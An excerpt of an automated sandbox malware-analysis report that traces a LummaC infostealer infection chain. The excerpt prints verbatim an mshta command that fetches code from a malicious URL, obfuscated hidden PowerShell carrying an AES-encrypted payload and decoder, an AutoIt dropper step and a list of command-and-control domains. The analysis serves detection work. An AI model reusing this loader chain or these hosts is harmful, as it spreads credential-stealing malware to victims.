      Source: mshta.exe, 00000003.00000002.2266013552.0000020567A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\6
      Source: powershell.exe, 00000007.00000002.2225276243.0000014E4DF80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: mshta.exe, 0000000C.00000003.2191192579.000001C2D424C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2209666982.000001C2D424D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EF607 BlockInput,15_2_001EF607
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00182D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00182D33
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0018310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0018310D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00194BF4 mov eax, dword ptr fs:[00000030h]15_2_00194BF4
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DC135 mov eax, dword ptr fs:[00000030h]15_2_015DC135
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E201A mov eax, dword ptr fs:[00000030h]15_2_015E201A
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E201A mov eax, dword ptr fs:[00000030h]15_2_015E201A
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E2021 mov eax, dword ptr fs:[00000030h]15_2_015E2021
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E2021 mov eax, dword ptr fs:[00000030h]15_2_015E2021
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015EDF8E mov eax, dword ptr fs:[00000030h]15_2_015EDF8E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0157D326 mov eax, dword ptr fs:[00000030h]16_2_0157D326
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_015713B2 mov eax, dword ptr fs:[00000030h]16_2_015713B2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_015713B2 mov eax, dword ptr fs:[00000030h]16_2_015713B2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_015713B9 mov eax, dword ptr fs:[00000030h]16_2_015713B9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_015713B9 mov eax, dword ptr fs:[00000030h]16_2_015713B9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0156B4CD mov eax, dword ptr fs:[00000030h]16_2_0156B4CD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D20BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,15_2_001D20BE
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001A2446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_001A2446
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00190E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00190E4D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00190F9F SetUnhandledExceptionFilter,15_2_00190F9F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001911EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_001911EE

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7956, type: MEMORYSTR
      Encrypted powershell cmdline option found
      Source: unknownProcess created: Base64 decoded .'mshta'https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      Source: unknownProcess created: Base64 decoded .'mshta'https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      LummaC encrypted strings found
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: assumedtribsosp.shop
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: chippyfroggsyhz.shop
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: budgetttysnzm.shop
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: creepydxzoxmj.shop
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: definitonizmnx.shop
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rainbowmynsjn.shop
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: boattyownerwrv.shop
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: empiredzmwnx.shop
      Source: AutoIt3.exe, 0000000F.00000002.1991466429.000000000417C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: templerrysjzkp.shop
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_001D230F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00182D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00182D33
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DC078 SendInput,keybd_event,15_2_001DC078
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001F2E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,15_2_001F2E89
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function tcqzac($xdloy){return -split ($xdloy -replace '..', '0x$& ')};$sqyqyit = tcqzac('2f92616fca1e637e204e02a98bab656b9ec67566c63384dbba915194a26af3c99ff78c879d2671a61f9de3ffd05ce7a373ec6999c11f2ae65d883254059a8f5dd52c6ef70bfd4877ec5470233ccf8c213a8f6c3b33f727d7efef9e317e238d51754c64f55fd36a2589609d7c13781064cd0882248925dc090ed875ea7328a961d8f19bda01e615861b627059f79049f57b3247a84c248ba78c08603403e1ae25a41b0a8e9dd38f8c4a4081d4274ae388388659516790b04238778e0f5658cc4e7b8f740a831b86ce3efd019a79f77be8f78eb2e2ca234d0c6d81a7ceace3f908562ba1ea41eab6ff399ef717aa496847befd1deb1f7b5aa3887325abf9eef02fe6982e64ec9d3a2425d14c12ad043dc5c6031be4743b30cb9771a566a007e065215522047c54a3a10753b2a266b4be44abb6cc95bd1c8f09e68f17760528bca6460c89abd112854b22d2a30fefacbdad91533869cbaa510d9aee6dfa15e320b7afd60201785519583ae149adc0f90a8952f25ff47a4ed635e1b047acfe73f6a3f4de14c2a855847af9be35a9b33a08c7abf7a00f27594b28d5e0fa51aa3f90bf24d901f140f816d5d4ebf7aa6fa485fdc8089fef1d65d5798a7a7c513efb05e816e80a2f1ddfe3ba76da0e722b38f8740dcb9e6e71b59d4e4cdfaa9f2ef98d1569b83ea76739999f4afc232f29abc60b904dfcca5f115a5a8559e36094e8f37943efcaba23e670d451ce32c68ad3028b217ceef7fb1cf47c97d30d069b3f065987b4f034029ee5d245366fe897472bbf68358f983c4388e9edbe009b15763ea5a4c065248c0153cb15a281585bc9621504c2ab9e8f3ba0a95a0dcf141add7a86bb23134bb59ce46943f1107fe42751b10616a7fa72ea7aa54509cb02831ae69bdf94a6d6fed1a11ceba936d6b8de427bdacbaa0aad1a7cfbeb89e6108def6f0852af4bb67846a3acf806d21d324d0c50b0f62cad51058d241391a6b2446d777805760a992c50dbc13108296d969c721cec4ba28b6488ab72df32bd755fc7d5c5d3d56680f0aab9bdc8dd664cbbf8e2bcdd82462778cef31e33c24a4749f12603eb49d4c9d110a17107c7b97c1e54eb654988e65ce15cd969f93c091dfabe466d71228914296a73b782ecf0fff3df80313ca3128bcd8296f524ee35db155c2ae0ef4c69075b57e36d24e8e31218ca60aa4fa168657c062b42b2f5ea45aafdbf6276668f6a9f867184e90c03c86c65bcce49654a66fa3d306694ffacdd32f762e1d88075f651c9159f15813eee0ca477a8c578c19d44d1e39e106809a3cd869b8e088acdcce32e23a70f5f942e8daee3012d81b73b3b94d05d727127dfda24f3f54ec5e3bfac83121df59e941dc4aca17ca5ead44c61de8bdf84e32290f7543abe02060dc41362b94a5f07eeee330b97553b46859432cc68f214b302c4e6f63055d0f83e01f7974f1b300238eec9b49ac5de3c1d9a3ed90f4056fdace9cd348ace2412cc387a9ff17100724c029b670ea9c692e997bff90aa0531e793e1dd4154e64151dcff01cce768c6db40ffff11494df2db99e1c1159873fa31a4e0eb1036654de9137700e275de2ae79bcb348d213215787a6a3452f822ef24303fc84259471e723768093e063d12dfca583a0490658323b87f8a0c3e9109f45d9a37f26ac77552d7c68589ca46a0e8d1ab24d1b10a54d0fb256338b5880738577ec794452bc27b0ba2fd9c876306e1588376a94292582e639fbc261e841194317c38ec2f485f56690f6ace333ee430ed468c2f9690e96f6497247eda10e0ff53275b4125360f8405e4758a308e913b6295d4f395d02b2239e6e4257b5152e7f8acd075e8c6b312ec73595c476bb1e814d001b81f9');$wkctd = [system.security.cryptography.aes]::create();$wkctd.key = tcqzac('7151766748794165544d79435557754
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function tcqzac($xdloy){return -split ($xdloy -replace '..', '0x$& ')};$sqyqyit = tcqzac('2f92616fca1e637e204e02a98bab656b9ec67566c63384dbba915194a26af3c99ff78c879d2671a61f9de3ffd05ce7a373ec6999c11f2ae65d883254059a8f5dd52c6ef70bfd4877ec5470233ccf8c213a8f6c3b33f727d7efef9e317e238d51754c64f55fd36a2589609d7c13781064cd0882248925dc090ed875ea7328a961d8f19bda01e615861b627059f79049f57b3247a84c248ba78c08603403e1ae25a41b0a8e9dd38f8c4a4081d4274ae388388659516790b04238778e0f5658cc4e7b8f740a831b86ce3efd019a79f77be8f78eb2e2ca234d0c6d81a7ceace3f908562ba1ea41eab6ff399ef717aa496847befd1deb1f7b5aa3887325abf9eef02fe6982e64ec9d3a2425d14c12ad043dc5c6031be4743b30cb9771a566a007e065215522047c54a3a10753b2a266b4be44abb6cc95bd1c8f09e68f17760528bca6460c89abd112854b22d2a30fefacbdad91533869cbaa510d9aee6dfa15e320b7afd60201785519583ae149adc0f90a8952f25ff47a4ed635e1b047acfe73f6a3f4de14c2a855847af9be35a9b33a08c7abf7a00f27594b28d5e0fa51aa3f90bf24d901f140f816d5d4ebf7aa6fa485fdc8089fef1d65d5798a7a7c513efb05e816e80a2f1ddfe3ba76da0e722b38f8740dcb9e6e71b59d4e4cdfaa9f2ef98d1569b83ea76739999f4afc232f29abc60b904dfcca5f115a5a8559e36094e8f37943efcaba23e670d451ce32c68ad3028b217ceef7fb1cf47c97d30d069b3f065987b4f034029ee5d245366fe897472bbf68358f983c4388e9edbe009b15763ea5a4c065248c0153cb15a281585bc9621504c2ab9e8f3ba0a95a0dcf141add7a86bb23134bb59ce46943f1107fe42751b10616a7fa72ea7aa54509cb02831ae69bdf94a6d6fed1a11ceba936d6b8de427bdacbaa0aad1a7cfbeb89e6108def6f0852af4bb67846a3acf806d21d324d0c50b0f62cad51058d241391a6b2446d777805760a992c50dbc13108296d969c721cec4ba28b6488ab72df32bd755fc7d5c5d3d56680f0aab9bdc8dd664cbbf8e2bcdd82462778cef31e33c24a4749f12603eb49d4c9d110a17107c7b97c1e54eb654988e65ce15cd969f93c091dfabe466d71228914296a73b782ecf0fff3df80313ca3128bcd8296f524ee35db155c2ae0ef4c69075b57e36d24e8e31218ca60aa4fa168657c062b42b2f5ea45aafdbf6276668f6a9f867184e90c03c86c65bcce49654a66fa3d306694ffacdd32f762e1d88075f651c9159f15813eee0ca477a8c578c19d44d1e39e106809a3cd869b8e088acdcce32e23a70f5f942e8daee3012d81b73b3b94d05d727127dfda24f3f54ec5e3bfac83121df59e941dc4aca17ca5ead44c61de8bdf84e32290f7543abe02060dc41362b94a5f07eeee330b97553b46859432cc68f214b302c4e6f63055d0f83e01f7974f1b300238eec9b49ac5de3c1d9a3ed90f4056fdace9cd348ace2412cc387a9ff17100724c029b670ea9c692e997bff90aa0531e793e1dd4154e64151dcff01cce768c6db40ffff11494df2db99e1c1159873fa31a4e0eb1036654de9137700e275de2ae79bcb348d213215787a6a3452f822ef24303fc84259471e723768093e063d12dfca583a0490658323b87f8a0c3e9109f45d9a37f26ac77552d7c68589ca46a0e8d1ab24d1b10a54d0fb256338b5880738577ec794452bc27b0ba2fd9c876306e1588376a94292582e639fbc261e841194317c38ec2f485f56690f6ace333ee430ed468c2f9690e96f6497247eda10e0ff53275b4125360f8405e4758a308e913b6295d4f395d02b2239e6e4257b5152e7f8acd075e8c6b312ec73595c476bb1e814d001b81f9');$wkctd = [system.security.cryptography.aes]::create();$wkctd.key = tcqzac('7151766748794165544d79435557754
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function tcqzac($xdloy){return -split ($xdloy -replace '..', '0x$& ')};$sqyqyit = tcqzac('2f92616fca1e637e204e02a98bab656b9ec67566c63384dbba915194a26af3c99ff78c879d2671a61f9de3ffd05ce7a373ec6999c11f2ae65d883254059a8f5dd52c6ef70bfd4877ec5470233ccf8c213a8f6c3b33f727d7efef9e317e238d51754c64f55fd36a2589609d7c13781064cd0882248925dc090ed875ea7328a961d8f19bda01e615861b627059f79049f57b3247a84c248ba78c08603403e1ae25a41b0a8e9dd38f8c4a4081d4274ae388388659516790b04238778e0f5658cc4e7b8f740a831b86ce3efd019a79f77be8f78eb2e2ca234d0c6d81a7ceace3f908562ba1ea41eab6ff399ef717aa496847befd1deb1f7b5aa3887325abf9eef02fe6982e64ec9d3a2425d14c12ad043dc5c6031be4743b30cb9771a566a007e065215522047c54a3a10753b2a266b4be44abb6cc95bd1c8f09e68f17760528bca6460c89abd112854b22d2a30fefacbdad91533869cbaa510d9aee6dfa15e320b7afd60201785519583ae149adc0f90a8952f25ff47a4ed635e1b047acfe73f6a3f4de14c2a855847af9be35a9b33a08c7abf7a00f27594b28d5e0fa51aa3f90bf24d901f140f816d5d4ebf7aa6fa485fdc8089fef1d65d5798a7a7c513efb05e816e80a2f1ddfe3ba76da0e722b38f8740dcb9e6e71b59d4e4cdfaa9f2ef98d1569b83ea76739999f4afc232f29abc60b904dfcca5f115a5a8559e36094e8f37943efcaba23e670d451ce32c68ad3028b217ceef7fb1cf47c97d30d069b3f065987b4f034029ee5d245366fe897472bbf68358f983c4388e9edbe009b15763ea5a4c065248c0153cb15a281585bc9621504c2ab9e8f3ba0a95a0dcf141add7a86bb23134bb59ce46943f1107fe42751b10616a7fa72ea7aa54509cb02831ae69bdf94a6d6fed1a11ceba936d6b8de427bdacbaa0aad1a7cfbeb89e6108def6f0852af4bb67846a3acf806d21d324d0c50b0f62cad51058d241391a6b2446d777805760a992c50dbc13108296d969c721cec4ba28b6488ab72df32bd755fc7d5c5d3d56680f0aab9bdc8dd664cbbf8e2bcdd82462778cef31e33c24a4749f12603eb49d4c9d110a17107c7b97c1e54eb654988e65ce15cd969f93c091dfabe466d71228914296a73b782ecf0fff3df80313ca3128bcd8296f524ee35db155c2ae0ef4c69075b57e36d24e8e31218ca60aa4fa168657c062b42b2f5ea45aafdbf6276668f6a9f867184e90c03c86c65bcce49654a66fa3d306694ffacdd32f762e1d88075f651c9159f15813eee0ca477a8c578c19d44d1e39e106809a3cd869b8e088acdcce32e23a70f5f942e8daee3012d81b73b3b94d05d727127dfda24f3f54ec5e3bfac83121df59e941dc4aca17ca5ead44c61de8bdf84e32290f7543abe02060dc41362b94a5f07eeee330b97553b46859432cc68f214b302c4e6f63055d0f83e01f7974f1b300238eec9b49ac5de3c1d9a3ed90f4056fdace9cd348ace2412cc387a9ff17100724c029b670ea9c692e997bff90aa0531e793e1dd4154e64151dcff01cce768c6db40ffff11494df2db99e1c1159873fa31a4e0eb1036654de9137700e275de2ae79bcb348d213215787a6a3452f822ef24303fc84259471e723768093e063d12dfca583a0490658323b87f8a0c3e9109f45d9a37f26ac77552d7c68589ca46a0e8d1ab24d1b10a54d0fb256338b5880738577ec794452bc27b0ba2fd9c876306e1588376a94292582e639fbc261e841194317c38ec2f485f56690f6ace333ee430ed468c2f9690e96f6497247eda10e0ff53275b4125360f8405e4758a308e913b6295d4f395d02b2239e6e4257b5152e7f8acd075e8c6b312ec73595c476bb1e814d001b81f9');$wkctd = [system.security.cryptography.aes]::create();$wkctd.key = tcqzac('7151766748794165544d79435557754Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function tcqzac($xdloy){return -split ($xdloy -replace '..', '0x$& ')};$sqyqyit = tcqzac('2f92616fca1e637e204e02a98bab656b9ec67566c63384dbba915194a26af3c99ff78c879d2671a61f9de3ffd05ce7a373ec6999c11f2ae65d883254059a8f5dd52c6ef70bfd4877ec5470233ccf8c213a8f6c3b33f727d7efef9e317e238d51754c64f55fd36a2589609d7c13781064cd0882248925dc090ed875ea7328a961d8f19bda01e615861b627059f79049f57b3247a84c248ba78c08603403e1ae25a41b0a8e9dd38f8c4a4081d4274ae388388659516790b04238778e0f5658cc4e7b8f740a831b86ce3efd019a79f77be8f78eb2e2ca234d0c6d81a7ceace3f908562ba1ea41eab6ff399ef717aa496847befd1deb1f7b5aa3887325abf9eef02fe6982e64ec9d3a2425d14c12ad043dc5c6031be4743b30cb9771a566a007e065215522047c54a3a10753b2a266b4be44abb6cc95bd1c8f09e68f17760528bca6460c89abd112854b22d2a30fefacbdad91533869cbaa510d9aee6dfa15e320b7afd60201785519583ae149adc0f90a8952f25ff47a4ed635e1b047acfe73f6a3f4de14c2a855847af9be35a9b33a08c7abf7a00f27594b28d5e0fa51aa3f90bf24d901f140f816d5d4ebf7aa6fa485fdc8089fef1d65d5798a7a7c513efb05e816e80a2f1ddfe3ba76da0e722b38f8740dcb9e6e71b59d4e4cdfaa9f2ef98d1569b83ea76739999f4afc232f29abc60b904dfcca5f115a5a8559e36094e8f37943efcaba23e670d451ce32c68ad3028b217ceef7fb1cf47c97d30d069b3f065987b4f034029ee5d245366fe897472bbf68358f983c4388e9edbe009b15763ea5a4c065248c0153cb15a281585bc9621504c2ab9e8f3ba0a95a0dcf141add7a86bb23134bb59ce46943f1107fe42751b10616a7fa72ea7aa54509cb02831ae69bdf94a6d6fed1a11ceba936d6b8de427bdacbaa0aad1a7cfbeb89e6108def6f0852af4bb67846a3acf806d21d324d0